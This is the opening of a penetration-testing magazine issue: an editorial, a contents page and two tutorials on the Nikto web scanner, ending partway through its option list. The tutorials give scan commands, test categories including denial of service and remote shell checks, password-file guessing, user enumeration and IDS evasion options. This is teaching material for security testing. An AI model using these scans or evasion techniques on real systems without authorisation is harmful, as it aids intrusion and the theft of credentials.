CYBER SECURITY AUDITING SOFTWARE
Configuration Auditing with no Network Traffic

Nipper Studio is your cyber security expert in a box. Our industry-leading security auditing tool allows you to produce detailed and thorough security audits of your network devices in seconds, at a fraction of the cost of manual testing.

KEY FEATURES
• Advanced, Detailed Reporting
• CVSSv2 Rating Systems
• Customizable Settings
• Easy to Action Mitigation Reports
• Multi-Platform Support
• Secure Offline Activation
PLUS much more...

Companies worldwide depend on their computer systems to successfully run their businesses. These systems often contain classified information, so it is imperative that they are secure. However, due to time and cost restrictions, manual penetration tests may happen only once or twice a year. Nipper Studio not only dramatically reduces the time taken for penetration testing but also helps you to feel secure in the intervals between manual audits. With Nipper Studio you can audit the same set of devices as many times as you like during your subscription period, so you can feel secure and stay secure.

With years of experience in the network auditing industry we understand it is important that a security audit highlights all potential threats and doesn't just review firewall rules. As a result, Nipper Studio's advanced and detailed reporting is used and trusted by global organisations in the financial, telecommunications, defence, government and security sectors, and has users in 40 countries worldwide.
NEW FEATURES!
• Raw Configuration Change Tracking: Nipper Studio reports now include the raw configuration changes from your network device. Nipper Studio highlights the options within your configuration that have been added or removed since the previous audit.
• Audit Change Tracking: You can now include a change comparison within your security audit. The report then highlights the vulnerabilities fixed, the issues still remaining and any new vulnerabilities that have appeared since your last audit. This gives you a clear view of how your system's security has progressed.
PLUS!..

Save Time
Security audits are time-consuming for both the system's owner and the auditors. A detailed examination of an average-sized configuration can take half a day, and the full report 2 to 3 weeks to complete. Nipper Studio can perform the audit and produce the final report in just a few seconds.

Save Money
Audit companies typically charge per man-day for auditing and reporting. For a 25-device network, an audit and report could take up to 3 weeks. An experienced security auditor would typically cost £1,000 per day, so an audit of a small network could cost up to £20,000. A Nipper Studio license for 25 devices costs only £600!
• Over 100 Plugins
• Technical Support and Updates

Multi-Platform Support for:
• Windows
• Linux
• Mac
PLUS more...

Nipper Studio Supported Devices
Titania Limited • County House • St Mary’s Street • Worcester WR1 1HB • UK Telephone: +44 (0)845 652 0621 • Email: enquiries@titania.com • www.titania.com Titania Limited is a company registered in England and Wales. Registered Number: 6870498. VAT Registration Number: 984 3990 61
Dear PenTesters!
Managing Editor: Krzysztof Wiśniewski krzysztof.wisniewski@software.com.pl
Betatesters: Jay Trinckes, Jeff Weaver
Proofreaders: Mark Barton, Tony Campbell, Kevin Fuller, Stefanus Natahusada, Cathryn Olds, Dyana Pearson, Emiliano Piscitelli, Adrian Rodriguez, Johan Snyman, Jeff Weaver, Ed Werzyn
Senior Consultant/Publisher: Paweł Marciniak
CEO: Ewa Dudzic ewa.dudzic@software.com.pl
Art Director: Ireneusz Pogroszewski ireneusz.pogroszewski@software.com.pl
DTP: Ireneusz Pogroszewski
Production Director: Andrzej Kuca andrzej.kuca@software.com.pl
Publisher: Software Press Sp. z o.o. SK, 02-682 Warszawa, ul. Bokserska 1
Phone: 1 917 338 3631
www.pentestmag.com

Whilst every effort has been made to ensure the high quality of the magazine, the editors make no warranty, express or implied, concerning the results of content usage. All trademarks presented in the magazine were used only for informative purposes. All rights to the trademarks presented in the magazine are reserved by the companies which own them. Mathematical formulas created by Design Science MathType™.
DISCLAIMER!
The techniques described in our articles may only be used in private, local networks. The editors hold no responsibility for misuse of the presented techniques or consequent data loss.
Since we believe that knowledge should be widely and freely available to everyone, we have decided to contribute to the information security community by releasing a new line of PenTest Magazine. What you are looking at is the very first issue of PenTest Open, our new monthly title, free to download for all of our readers – both free members and subscribers. Every issue of PenTest Open will contain extracts from the latest issues of our regular titles: PenTest Regular, Auditing & Standards PenTest, PenTest Extra and Web App PenTesting, selected by our experts, giving you the opportunity to familiarize yourself with the best articles from every month and allowing you to learn about new methodologies, techniques and tools used by infosec professionals.

So let's have a look at what we've prepared for you this time. From our main magazine, PenTest Regular, we chose two articles concerning Nikto. In the first one, Eduard Kovacs presents Nikto as a two-edged sword: a useful tool, but also a dangerous instrument used by criminals. As he argues, cyber security is a very important issue in modern society. In the second article, with a little help from Ankhorus, we learn how to launch mutation techniques with Nikto.

In the ISO 27001 section from Auditing & Standards PenTest, Paulo Coelho introduces us to four popular misconceptions about this standard. After a quick introduction, we learn once more that well-known truths are not always trustworthy. Reading further, we find an article by Alan Cook, where he shows that sometimes technology is the answer to our security problems, based of course on the great example of ISO 27001.

From Web App PenTest we give you the most developed section of this issue, about Burp Suite. Kilian Faughnan gives us a quick introduction to the processes used to identify vulnerabilities, both automated and manual. His article goes through some of the commonly used components of the PortSwigger Burp Suite, looking at the automated and manual processes that can be used to identify vulnerabilities in web applications, and how to leverage both methods in order to get the most out of the Burp Suite. Then Gerasimos Kassaras presents a tutorial on how to exploit an External Entity Injection vulnerability using Burp Suite. We also find out what the Burp Suite really is, and in how many areas we can use it. Finally, Omar Al Ibrahim shares his experiences in web penetration testing using this tool. He describes Burp Proxy, the main tool of Burp Suite, and its latest extensions, providing some useful tools and features for web penetration testing.

At the end of this issue, we give you a comprehensive article about SSH tunnels from our latest magazine. Andrea Zwirner teaches you how to use SSH tunnels in different ways, for example to bypass network and web application firewalls, or to bypass proxies and content inspection devices, and much more.

We hope that you'll find the new line of PenTest Magazine useful and compelling. Thank you all for your great support and invaluable help. Enjoy reading!

Krzysztof Wiśniewski & PenTest Team
OPEN 01/2013
Page
4
http://pentestmag.com
CONTENTS

NIKTO

06 Nikto: A Powerful Web Scanner Used by Researchers and Cybercriminals Alike
by Eduard Kovacs
Cyber security has become a highly important issue in recent years. Both individuals and companies have started realizing that computers and the Internet in general are not only a way to have fun or perform various work tasks in an efficient manner, but also a "tool" for criminals to commit crimes with.

12 Nikto: How to Launch Mutation Techniques
by Ankhorus
Nikto is an open source web server assessment tool. It is designed to find various default and insecure or dangerous files/CGIs, configurations and programs on any type of web server. It scans a web server for software misconfigurations, insecure files, and outdated servers and programs to find security vulnerabilities.

ISO 27001

22 Four Misconceptions About ISO/IEC 27001
by Paulo Coelho
The article tries to deconstruct some of the misconceptions about ISO/IEC 27001. This security management standard is said to require the introduction of control activities into normal business and IT operations, which consequently increases the workload and causes operational inefficiencies.

26 Testing Your Most Valuable Assets
by Alan Cook
When thinking about Information Security, we can sometimes be forgiven for thinking that technology is the answer to all our security problems.

BURP SUITE

32 Burp Suite – Automated and Manual Processes Used to Identify Vulnerabilities
by Killian Faughnan
As most penetration testers know, there is no amount of automated tools that could replace a real-life pen-tester. Sure, in our testing we use automated tools to assist and speed up the process, but when you really get down to it, there is no substitution for doing it yourself. This article will go through some of the more commonly used components of the PortSwigger Burp Suite, looking at the automated and manual processes that can be used to identify vulnerabilities in web applications, and how to leverage both methods in order to get the most out of the Burp Suite.

42 How To Infiltrate Corporate Networks Using XML External Entity Injection
by Gerasimos Kassaras
This tutorial is going to explain how to exploit an External Entity Injection (XXE) vulnerability using Burp Suite and make the most of it. Burp Suite is an integrated platform for performing security testing of web applications. Its various tools work seamlessly together to support the entire testing process, from initial mapping and analysis of an application's attack surface through to finding and exploiting security vulnerabilities.

46 Web Application Penetration Testing Using Burp Suite
by Omar Al Ibrahim
Burp Suite is an integrated platform with a number of tools and interfaces to enumerate, analyze, scan, and exploit web applications. Its main tool, Burp Proxy, is used to intercept HTTP requests/responses, but it has recently been extended to provide a suite of other useful tools for web penetration testing. In this article, I will introduce some of the features of Burp Suite and share my experiences in web penetration testing using these tools.

SSH TUNNELS

56 SSH Tunnels: How to Attack Their Security
by Andrea Zwirner
You will learn how to use SSH tunnels to bypass network and web application firewalls and antiviruses; how to encapsulate SSH tunnels to bypass proxies and content inspection devices; how the privilege separation programming pattern enforces local process security; and how to trace SSH daemon activities in order to steal login passwords and sniff SSH-tunneled communications by catching inter-process communications.
NIKTO
Nikto: A Powerful Web Scanner Used by Researchers and Cybercriminals Alike

This article is devoted to the web server scanner tool Nikto. First I will describe the tool itself, its features and flavors. Then I will show the reader a fast way to set it up, scan a host and create a report.
That's why, in recent years, Internet users have become aware of the fact that they can't trust emails informing them that they've won a lottery, or social network posts telling them to click on a link to see an outrageous video. At the same time, organizations are starting to learn that they must properly test their web servers and their websites to make sure that they're not plagued by security holes which could be exploited by a malicious actor. This is where Nikto steps in. Penetration testers and IT departments can use this powerful web server scanner to identify the issues that expose networks and digital assets to cybercriminals and their campaigns.
Introduction
Nikto is a Perl-based open source web server/website scanner, developed back in 2001 by Chris Sullo, the co-founder of the Open Security Foundation. The latest version of the tool is capable of performing tests against over 6,500 potentially dangerous files and CGIs. It's also designed to check for version-specific problems on more than 270 servers and, since keeping a machine up to date is so important these days, Nikto can also tell you if server variants are outdated. One noteworthy thing here is that the pentesting tool can check for the outdated versions of 1,250 servers. Potentially dangerous files, Directory Traversal, outdated software, cross-site scripting (XSS), SQL Injection, misconfigured applications, and Remote File Inclusion are just some of the issues that can be easily identified by Nikto.

In April 2012, security firm Imperva released a study highlighting the fact that in a large majority of the cyberattacks they analyzed, the attackers relied on automated tools. This tactic allows even unskilled cybercriminals to launch devastating attacks. According to Imperva's report, 98% of Remote File Inclusion (RFI) attacks and 88% of SQL Injection attacks are in fact automated. The report reveals that one of the tools often utilized in automated attacks against websites and web servers is Nikto. To sum it up, the attacks in which Nikto is leveraged have a typical user agent, they don't have "Accept" headers, show a high frequency of requests, and have a typical URL used for Remote File Inclusion. The fact that it relies on a typical user agent makes Nikto less stealthy, but that's because it's not designed to be. The developers clearly state that the scanner is not an "overly stealthy tool." Instead, it's designed to be fast and efficient.
On the other hand, one of the reasons why cybercriminals prefer it might be the fact that, as Imperva highlights, there's nothing to suggest that the source of the attack has a malicious reputation. I've mentioned this particular Imperva study, and the fact that Nikto is utilized in cyberattacks, not because I want to encourage the use of Nikto for malicious purposes, but to underscore the fact that it's a very powerful tool. It's well known that cybercriminals tend to use the best resources available, and the fact that Nikto is one of them says a lot about the scanner's potential.
Nikto
Nikto requires a Perl interpreter to run, but that shouldn't be an issue for Linux users, since many distributions come with one by default. Furthermore, I've seen some Linux variants that come with Nikto installed by default. Windows users are advised to install Nikto in a virtual machine running Ubuntu or a similar operating system. For those who aren't too keen on running Nikto from inside a Linux virtual machine, here's what you need. First of all, you must install Perl. Any version that works on Windows will do, but I would recommend something like ActivePerl by ActiveState. Once Perl is installed, you'll need an archive utility that can extract .tar files, the Microsoft Visual C++ 2008 Redistributable, and NMake, a clever tool that builds projects based on commands from a description file; the latter two are available on Microsoft's website. You also need a C compiler, OpenSSL and the Perl SSL module Net_SSLeay.pm, available on CPAN.org.

Apple Mac OS users, on the other hand, can use one of the versions specially made for their systems. For instance, there's Yang (Yet Another Nikto GUI), which is available for free on the App Store. Apple customers can also turn to MacNikto, an AppleScript GUI shell script wrapper built in Xcode and Interface Builder. MacNikto is designed to place Nikto's powerful scanning and reporting engine behind an easy-to-use interface. One noteworthy thing is that Nikto itself isn't incorporated into MacNikto: users must make sure that Nikto is present on the computer before running MacNikto.

Since these variants of Nikto come with a window-based user interface, they're somewhat more attractive and easier to use.
Running Nikto
If you're on Linux, all you have to do is extract the .tar archive that contains Nikto, open a command terminal and navigate to the application's directory using the cd command. Once you're in the Nikto directory, and provided you have a Perl interpreter installed, you can run it with the following command: perl nikto.pl [parameter(s)]. One noteworthy aspect is that if you want to test SSL servers, you need to install the Net::SSLeay Perl module, available from the CPAN repository.
Basic Commands
Nikto has come a long way since the first version, many of the improvements being made based on tickets submitted by those who use the tool. New plugins and features are added with almost every release, and all you have to do to update your installation to the latest version is use the –update command. If you're not familiar with Nikto and don't know any of the parameters, just type perl nikto.pl and you will be presented with all the available commands. By running the program with the –Help command, users can learn in detail what each command line option is good for (Figure 1). As a general rule, most of the commands have shortcuts. For example, –port can also be written as –p, –host can be used as –h, and so on. The -ask command controls the update process: if it is followed by Yes, Nikto asks before submitting an update, this being the default setting. Other parameters are No and Auto.

Figure 1. Using the –Help command to see a detailed list of Nikto options

When scanning CGI directories, users must specify –Cgidirs, followed by special words such as none or all, depending on which locations they want to test. There's also a way to only discover the HTTP or HTTPS ports and report the server's header, without performing an actual scan; this can be achieved with the –findonly command. In case you need to authenticate before testing a target host, the –id command followed by username:password is very useful. Another interesting, and highly important, command is –Display, which helps users control the output. For example, if you want to see the redirects that take place, you can use –Display 1; 2 and 3 are arguments that show received cookies and 200/OK responses, respectively. D is for debug output, E shows all HTTP errors, P prints progress to STDOUT, and V is for verbose output (Figure 2). Other noteworthy command line options are –IgnoreCode, -maxtime, -nocache, -nolookup, -nointeractive, -nossl, -no404, -pause, -until, -version, and -vhost. Finally, the most important command is –host, which lets users specify which host they want to test.
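To make the display options above concrete, here is a small sketch that composes a scan command with several -Display values combined. The target address is made up, and the command is only printed, not executed, so you can check it before running it for real:

```shell
target="192.168.0.1"   # hypothetical target, replace with your own
display="1EV"          # 1 = show redirects, E = show HTTP errors, V = verbose
cmd="perl nikto.pl -h $target -Display $display"
echo "$cmd"
```

Running this prints the full command line, which you could then paste into a terminal inside the Nikto directory.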
Basic tests
The most basic test can be performed with the following command (the IP address must be replaced with that of the targeted host): perl nikto.pl –h 192.168.0.1. If you don't know the IP address of your target, you can simply replace the IP with the URL: perl nikto.pl –h http://targetwebsite.com (Figure 3).

If you're interested in scanning a specific port, you can add the –p parameter followed by the port number. If no port is specified, Nikto will automatically scan port 80, which is the most common. It doesn't matter if the tested host is an SSL server, since the application will test HTTPS implicitly if the HTTP test fails, but if you want to speed up the process, you can add the –ssl parameter. So, to test your SSL host's port 443 as quickly as possible, all you have to do is write: perl nikto.pl -h targetwebsite.com -p 443 –ssl. You are not limited to testing only one port. You can test as many as you want by specifying their numbers or a range: perl nikto.pl -h testwebsite.com -p 80-90,443 –ssl.

With Nikto, you don't have to limit your tests to only one host. You can scan multiple hosts in one session by placing the host names or IP addresses in a file, with each target written on a separate line. Then, when you start the process, instead of writing the IP or the host name after the –h parameter, you write the name of the file.

Another advantage of this particular application is that it can be used to check hosts that can be accessed only through an HTTP proxy. This can be done by using the –useproxy command followed by the proxy's details. For instance: perl nikto.pl –h localhost –useproxy http://localhost:8080/.

One good thing about Nikto is that in some cases it provides the user with a link that points to additional resources related to the identified vulnerabilities (see Figure 7 and Figure 8).

Figure 2. Utilizing the –Display E command to display all HTTP errors
Figure 3. Basic test performed in Nikto
Figure 4. The current scan status displayed by pressing the space bar
Figure 5. Utilizing the -mutate command to test all files with all root directories
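The multi-host workflow described above can be sketched as follows. The host names and addresses are made up for illustration; the point is simply one target per line, then the file name passed to -h:

```shell
# Build a target list, one host per line (all hosts here are hypothetical).
cat > targets.txt <<'EOF'
192.168.0.10
192.168.0.11
testwebsite.com
EOF

wc -l < targets.txt   # confirm the number of targets in the file

# The multi-host scan itself would then be:
#   perl nikto.pl -h targets.txt
```

Nikto will work through the file one target at a time, so the same session covers the whole list.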
Interactive options and output formats
Users who run Nikto on a system that provides POSIX support can change several options while a scan is taking place. For instance, if you press the space bar during the scan, you will see a report on the current scan status (Figure 4). The v key can be used to toggle verbose mode, e to toggle error reporting, p for progress reporting, d to turn the debug mode on or off, c for cookie display, r to turn the redirect display on or off, and q to quit. The scan can be paused by pressing P, and the next host can be selected by pressing the N key.

The results of your work can be saved in a number of formats, including HTML, CSV, text and XML. The best part is that the final report can even be exported to Metasploit. The output file's format can be selected by using the –Format parameter together with –output.

Figure 6. Utilizing the –Tuning (-T) command to scan for specific vulnerabilities
Fine tuning and mutating scans
For more customized tests, there are two very important commands: -mutate and –Tuning. The –mutate command must be followed by arguments such as 1, 2, 3, 4, 5 and 6, each of them designed for a specific mutation technique. 1 tests all files with all root directories, 2 is used for guessing password file names, and 3 and 4 for enumerating user names via Apache and via cgiwrap, respectively. Assuming that the host name is the parent domain, sub-domain names can be brute-forced with –mutate 5. Directory names from a supplied dictionary file can be guessed with –mutate 6. Extra information on mutations can be obtained with –mutate-options (Figure 5).

By default, Nikto performs all tests against the selected target, but there may be situations in which a pentester wants to scan only for specific issues. That's where the –Tuning (-T) option steps in. The command arguments are the following: 0 – File Upload; 1 – Interesting File / Seen in logs; 2 – Misconfiguration / Default File; 3 – Information Disclosure; 4 – Injection (XSS/Script/HTML); 5 – Remote File Retrieval – Inside Web Root; 6 – Denial of Service; 7 – Remote File Retrieval – Server Wide; 8 – Command Execution / Remote Shell; 9 – SQL Injection; a – Authentication Bypass; b – Software Identification; c – Remote Source Inclusion.

If you want to test a server for Denial of Service, SQL Injection and XSS Injection, you use: perl nikto.pl –h http://targetwebsite.com –T 469. On the other hand, if you want to test for all of these vulnerabilities except Command Execution (8), you don't have to write –T 12345679. Instead, you use the x argument to negate tests. The command line would be: perl nikto.pl –h http://targetwebsite.com –T x8 (Figure 6).

Evasion

Figure 7. Utilizing the –e command to use the directory selfreference evasion technique
The intrusion detection system evasion techniques are also very important. They include random URI encoding (1), directory self-reference (2), premature URL ending (3), prepending a long random string (4), the use of fake parameters (5), TAB as request spacer (6), changing the case of the URL (7), the use of Windows directory separators (8), and the use of carriage return (0x0d) (A) and binary value 0x0b (B) as request spacers (Figure 7 and Figure 8). Although high-performance intrusion detection systems are likely to catch these evasion techniques, they can still be highly useful. The evasion techniques can be used during a scan by specifying the technique's associated number or letter after the –evasion or –e command. For instance, to use directory self-reference, you have to write: perl nikto.pl –h http://192.168.1.2 –e 2. Multiple evasion techniques can be used in the same scan simply by writing the associated arguments of all the techniques you wish to use: perl nikto.pl –h http://192.168.1.2 –e 246A.
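As a memory aid for the single-character codes above, here is a tiny lookup helper of our own (it is not part of Nikto) that expands an -e argument string such as 246A into the technique names it combines:

```shell
# Map a single -e evasion code to its technique name (codes as listed above).
evasion_name() {
  case "$1" in
    1) echo "random URI encoding";;
    2) echo "directory self-reference";;
    3) echo "premature URL ending";;
    4) echo "prepend long random string";;
    5) echo "fake parameters";;
    6) echo "TAB as request spacer";;
    7) echo "change the case of the URL";;
    8) echo "Windows directory separators";;
    A) echo "carriage return (0x0d) as request spacer";;
    B) echo "binary value 0x0b as request spacer";;
  esac
}

# The codes combined in "perl nikto.pl -h <host> -e 246A" are:
for c in 2 4 6 A; do evasion_name "$c"; done
```

The same pattern works for checking any -e string before you run the scan.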
Plugins
Since plugins sit at the base of Nikto, they're highly important. Users can develop their own plugins or use existing ones, depending on their needs. To list the existing plugins there is –list-plugin, and to actually use them, you must use the –plugin command, followed by the name of the plugin (Figure 9). Of course, you're not limited to using only one plugin. You can use all the available ones with –plugin @@ALL, none of them with –plugin @@NONE, or the default ones with @@DEFAULT (Figure 10).

The implicitly installed plugins are nikto_core, nikto_realms, nikto_headers, nikto_robots, nikto_httpoptions, nikto_outdated, nikto_msgs, nikto_apacheusers, nikto_mutate, nikto_passfiles, nikto_user_enum_apache and nikto_user_enum_cgiwrap. Each of these elements has a special purpose. For example, nikto_realms is an interesting one because it checks whether the server uses HTTP basic authentication. If the target is protected by a username and a password, default credentials are loaded in an attempt to log in. Another noteworthy plugin is nikto_outdated, which checks for outdated server versions by comparing the target's version against a list of up-to-date servers found in the outdated.db file. Why is this important? Because in many of the cyberattacks launched these days, the first thing the attacker looks for is an outdated server variant with known and easy-to-exploit vulnerabilities. Security experts always say that up-to-date components are one of the most important factors in protecting a network against malicious campaigns.

If the existing plugins don't satisfy the pentester's needs, additional ones can be created in Perl. However, the developer must be careful not to use variable and routine names that conflict with the ones already used by Nikto. The run_plugin() function will correctly execute a plugin if the naming convention is respected (the file must be named nikto_pluginname.plugin) and the initialization routine is named the same as the plugin. Finally, in order for it to work, the plugin must be added to the nikto_plugin_order.txt file.

Figure 8. Utilizing the –e command to use the random URI encoding evasion technique
Figure 9. Utilizing the –list-plugin command to display all available plugins
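The naming convention above can be sketched with a hypothetical plugin called "example". The file location and stub contents here are illustrative, not a working plugin; the point is the nikto_<name>.plugin file name, the matching routine name, and the entry in nikto_plugin_order.txt:

```shell
# Hypothetical layout: a plugins/ directory relative to the Nikto directory.
mkdir -p plugins

# File name must follow the nikto_<name>.plugin convention, and the
# initialization routine must share the plugin's name.
cat > plugins/nikto_example.plugin <<'EOF'
sub nikto_example {
    # initialization routine, named after the plugin
}
1;
EOF

# Register the plugin so run_plugin() will pick it up.
echo "nikto_example" >> plugins/nikto_plugin_order.txt

grep -c "sub nikto_example" plugins/nikto_example.plugin
```

If any of the three pieces (file name, routine name, registration line) is missing or mismatched, the plugin will not be executed.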
Figure 10. Utilizing the –plugin @@DEFAULT command to use the default plugins during scan
Integration and logging

Nessus users can also call Nikto. The results of a scan performed by Nikto can be incorporated into Nessus' output with the use of the nikto.nasl plugin. For those who don't know, Nessus is another comprehensive vulnerability scanning program, available for free for non-commercial use. I don't know where it stands now, but a few years ago it was called the world's most popular vulnerability scanner. Support for logging to Metasploit is also available, but in order for it to function, users need to install these modules: RPC::XML and RPC::XML::Client.

References

• http://www.madirish.net/185
• http://www.howtoforge.com/apache_security_testing_with_nikto
• http://va-holladays.no-ip.info:2200/tools/securitydocs/nikto-v1.0.pdf
• http://cirt.net
• http://blog.tenablesecurity.com/2008/09/using-nessus-to.html
• http://commons.oreilly.com/wiki/index.php/Network_Security_Tools/Modifying_and_Hacking_Security_Tools/Writing_Plug-ins_for_the_Nikto_Vulnerability_Scanner
• http://news.softpedia.com/news/Imperva-Hackers-Use-Automated-Tools-in-Most-Attacks-266302.shtml
• http://linux.softpedia.com/get/System/Networking/Nikto-10271.shtml
• Web Security Testing Cookbook, by Paco Hope and Ben Walther
Known issues and limitations

One issue with Nikto is that it can produce a lot of false positives and bring up a lot of unimportant issues, so the results must be double-checked by the penetration tester, who must manually go through a number of potential false positives in order to identify the real issues. As Paco Hope and Ben Walther highlight in their book "Web Security Testing Cookbook," Nikto can detect the presence of problems, but it cannot prove the absence of problems. If Nikto doesn't find any vulnerabilities, it doesn't necessarily mean that there aren't any. Professional penetration testers who have been using Nikto for a long time will probably find its results less valuable after a while. More importantly, experts recommend against using it as a quality metric or as a gate in the software development process. Instead, it's best suited for scanning websites after major changes have been applied to them.

Conclusion

Nikto is not a foolproof tool, but it has certainly come a long way since it was launched. Furthermore, judging by the fact that its developers are constantly working on improving it, the scanner will probably become an even more valuable resource for penetration testers. Although it doesn't have a fancy user interface with colorful buttons and graphical elements for reporting, Nikto is not that difficult to use, even if you're just at the beginning of your journey as a security researcher. On the other hand, it does force you to verify each result to make sure it really exists. So, whether you are a penetration tester, a web developer, or a member of your company's IT department, Nikto is certainly a web scanner worth looking into, not only because it's free, but also because it checks some things you probably wouldn't think of trying. You might be presented with false positives, but there probably isn't such a thing as a perfect web scanner.
Eduard Kovacs
Eduard Kovacs is a security news editor at Softpedia – the free downloads encyclopedia. He covers topics such as privacy, data breaches, information security research, and online safety. You can find him on Twitter (@EduardKovacs), Google Plus (Kovacs Eduard) and at news.softpedia.com/cat/Security/
Nikto: How to Launch Mutation Techniques

This article is devoted to the web server scanner tool Nikto. First I will describe the tool itself, its features and flavors. Then I will show the reader a fast way to set it up, scan a host and create a report.
Nikto is an open source web server assessment tool. It is designed to find various default and insecure or dangerous files/CGIs, configurations and programs on any type of web server (Figure 1). It scans a web server to find potential problems and security vulnerabilities, including:

• Server and software misconfigurations
• Default files and programs
• Insecure files and programs
• Outdated servers and programs
Nikto is built on LibWhisker2 and can run on any platform which has a Perl environment. It supports SSL, proxies, host authentication, attack encoding and more. It can be updated automatically from the command line, and supports the optional submission of updated version data back to the maintainers.

Figure 1. Nikto in Backtrack

Logic of Advanced Error Detection

Most web security tools rely heavily on the HTTP response to determine whether a page or script exists on the target. Because many servers do not properly adhere to RFC standards and return a 200 "OK" response for requests which are not found or forbidden, this can lead to many false positives. In addition, error responses for various file extensions can differ: the "not found" response for a .html file is often different from that for a .cgi. As of version 2.0, Nikto no longer assumes the error pages for different file types will be the same. A list of unique file extensions is generated at run-time, and each of those extensions is tested against the target. For every file type, the "best method" of determining errors is found: standard RFC response, content match or MD5 hash. This allows Nikto to use the fastest and most accurate method for each individual file type, and therefore helps eliminate the false positives seen for some servers in version 1.32 and below.

For example, if a server responds with a 404 "not found" error for a non-existent .txt file, Nikto will match on the HTTP response of "404" in tests. If the server responds with a 200 "OK" response, it will try to match on the content and, assuming it finds a match (for example, the words "could not be found"), it will use this method for determining missing .txt files. If the other methods fail, Nikto will attempt to remove date and time strings from the returned page's content, generate an MD5 hash of the content, and then match that hash value against future .txt tests. The latter is by far the slowest type of match, but in many cases will provide valid results for a particular file type.

This feature works by making several requests for non-existent pages of various file types, which may add up to a thousand requests to the remote server during the lifetime of the scan. This may not be desirable over a slow connection and can be disabled with the -no404 option.

Nikto is not designed as an overly stealthy tool. It will test a web server in the quickest time possible,
and is fairly obvious in log files. However, there is support for LibWhisker’s anti-IDS.
Requirements to run Nikto
Any system which supports a basic Perl installation should allow Nikto to run. It has been tested on:

• Windows (using ActiveState Perl and Strawberry Perl). Some POSIX features, such as interactive commands, may not work under Windows.
• Mac OSX
• Various Linux and Unix installations (including RedHat, Solaris, Debian, Ubuntu, Backtrack, etc.)

The only required Perl module that does not come standard is LibWhisker. Nikto comes with, and is configured to use, a local LW.pm. As of Nikto version 2.1.5, the included LibWhisker differs (slightly) from the standard LibWhisker 2.5 distribution.
Installation
Nikto comes pre-installed on the Backtrack OS, so there is no need to install it there. On other operating systems you need to download the Nikto package and unpack the downloaded file:
Figure 2. Nikto location in Backtrack
tar -xvzf nikto-current.tar.gz
Assuming a standard OS/Perl installation, Nikto should now be usable (Figure 2).
Basic Testing
The most basic Nikto scan requires simply a host to target, since port 80 is assumed if none is specified. The host can either be an IP or a hostname of a machine, and is specified using the -h (-host) option. This will scan the IP 192.168.1.5 on TCP port 80: To check on a different port, specify the port number with the -p (-port) option. This will scan the IP 192.168.1.5 on TCP port 443: Hosts, ports and protocols may also be specified by using a full URL syntax, and it will be scanned: There is no need to specify that port 443 may be SSL, as Nikto will first test regular HTTP and if that fails, HTTPS. If you are sure it is an SSL server, specifying -s (-ssl) will speed up the test.
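The command lines referenced above were dropped from the magazine layout; the following is a reconstruction using standard Nikto syntax (the IP addresses are the ones named in the text):

```shell
# Scan 192.168.1.5 on the default TCP port 80
perl nikto.pl -h 192.168.1.5

# Scan 192.168.1.5 on TCP port 443
perl nikto.pl -h 192.168.1.5 -p 443

# Specify host, port and protocol using full URL syntax
perl nikto.pl -h http://192.168.1.5:8080/

# Skip the plain-HTTP probe when the target is known to be SSL
perl nikto.pl -h 192.168.1.5 -p 443 -ssl
```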
A hosts file may also be nmap output in "greppable" format (i.e. the output from -oG). A file may be passed to Nikto through stdin by using "-" as the filename. For example:

nmap -p80 192.168.0.0/24 -oG - | nikto.pl -h -
Using a Proxy
If the machine running Nikto only has access to the target host (or update server) via an HTTP proxy, the test can still be performed. There are two ways to use a proxy with Nikto, via the nikto.conf file or directly on the command line (Figure 3). To use the nikto.conf file, set the PROXY* variables, and then execute Nikto with the -useproxy option. All connections will be relayed through the HTTP proxy specified in the configuration file. To set the proxy on the command line, use the -useproxy option with the proxy set as the argument, for example:
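The command-line form referenced above can be sketched as follows; the proxy host and port are illustrative placeholders:

```shell
# Relay all scan traffic through an HTTP proxy given on the command line
perl nikto.pl -h 192.168.1.5 -useproxy http://proxyhost:8080/
```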
Multiple Port Testing

Nikto can scan multiple ports in the same scanning session. To test more than one port on the same host, specify the list of ports in the -p (-port) option. Ports can be specified as a range (i.e., 80-90) or as a comma-delimited list (i.e., 80,88,90). This will scan the host on ports 80, 88 and 443.

Updating

Nikto can be updated automatically, assuming you have Internet connectivity from the host Nikto is installed on. To update to the latest plugins and databases, simply run Nikto with the -update option (Figure 4).
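The two invocations just described can be sketched as (the host address is illustrative):

```shell
# Scan ports 80, 88 and 443 on a single host in one session
perl nikto.pl -h 192.168.1.5 -p 80,88,443

# Fetch the latest plugins and databases from cirt.net
perl nikto.pl -update
```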
Multiple Host Testing
Figure 3. Proxy settings in .conf file
Figure 4. Updating process- Nikto
Nikto supports scanning multiple hosts in the same session via a text file of host names or IPs. Instead of giving a host name or IP for the -h (-host) option, a file name can be given. A file of hosts must be formatted as one host per line, with the port number(s) at the end of each line. Ports can be separated from the host and other ports via a colon or a comma. If no port is specified, port 80 is assumed. This is an example of a valid hosts file:

192.168.1.5:80
http://192.168.1.5:8080/
192.168.1.7
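As a runnable sketch, such a hosts file can be created and handed to Nikto like this (the Nikto invocation is commented out since it requires Nikto on the PATH):

```shell
# Write a hosts file: one target per line, port 80 assumed when omitted
cat > targets.txt <<'EOF'
192.168.1.5:80
http://192.168.1.5:8080/
192.168.1.7
EOF

# Feed the file to Nikto in place of a single host
# perl nikto.pl -h targets.txt
```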
Updates may also be manually downloaded from the appropriate version's directory at http://cirt.net/nikto/UPDATES/. Plugin and database files from the server should replace those in the 'plugins' or 'databases' directories.
Interactive Features
Nikto contains several options which can be changed during an active scan, provided it is running on a system which provides POSIX support (which includes *nix and some other operating systems). On systems without POSIX support, these features will be silently disabled. During an active scan, pressing any of the keys below will turn the listed feature on or off, or perform the listed action. Note that these are case sensitive.

SPACE – Report current scan status
v – Turn verbose mode on/off
d – Turn debug mode on/off
e – Turn error reporting on/off
p – Turn progress reporting on/off
r – Turn redirect display on/off
c – Turn cookie display on/off
o – Turn OK display on/off
a – Turn auth display on/off
q – Quit
N – Next host
P – Pause

All Options

Below are all of the Nikto command line options and explanations. A brief version of this text is available by running Nikto with the -h (-help) option (Figure 5).

-ask

Whether to ask about submitting updates: yes (ask about each – the default), no (don't ask, don't send), auto (don't ask, just send).

-Cgidirs

Scan these CGI directories. The special words "none" or "all" may be used to scan no CGI directories or all of them, respectively. A literal value for a CGI directory, such as "/cgi-test/", may be specified (it must include the trailing slash). If this option is not specified, all CGI directories listed in nikto.conf will be tested.

-config

Specify an alternative config file to use instead of the nikto.conf file located in the install directory.

-dbcheck

Check the scan databases for syntax errors.

-Display

Control the output that Nikto shows. Use the reference number or letter to specify the type; multiple may be used:

1 – Show redirects
2 – Show cookies received
3 – Show all 200/OK responses
4 – Show URLs which require authentication
D – Debug output
E – Display all HTTP errors
